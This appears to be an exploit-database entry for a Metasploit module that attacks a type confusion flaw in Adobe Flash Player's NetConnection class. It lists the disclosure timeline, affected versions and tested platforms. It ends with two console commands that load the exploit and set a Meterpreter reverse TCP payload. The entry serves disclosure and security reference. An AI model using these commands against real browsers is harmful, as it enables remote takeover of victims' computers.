Timeline :

Vulnerability discovered and reported to the vendor by Natalie Silvanovich in January 2015
Patch provided by the vendor via APSA15-05 the 2015-03-12
Vulnerability found exploited into exploit kits the 2015-03-19
Details of the vulnerability provided by Google Security the 2015-04-13
Metasploit PoC provided the 2015-05-28

PoC provided by :

Natalie Silvanovich
juan vazquez

Reference(s) :


Affected version(s) :

Adobe Flash Player and earlier versions
Adobe Flash Player and earlier 11.x versions

Tested on :

Windows 7 SP1 with IE 8 and Flash

Description :

This module exploits a type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and ultimately accomplish remote code execution. This module has been tested successfully on:

* Windows 7 SP1 (32-bit), IE 8, IE11 and Adobe Flash
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash
* Windows 8.1, Firefox 38.0.5 and Adobe Flash
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash
* Ubuntu 14.04.2 LTS, Firefox 33.0 and Adobe Flash

Commands :

use exploit/multi/browser/adobe_flash_net_connection_confusion
set PAYLOAD windows/meterpreter/reverse_tcp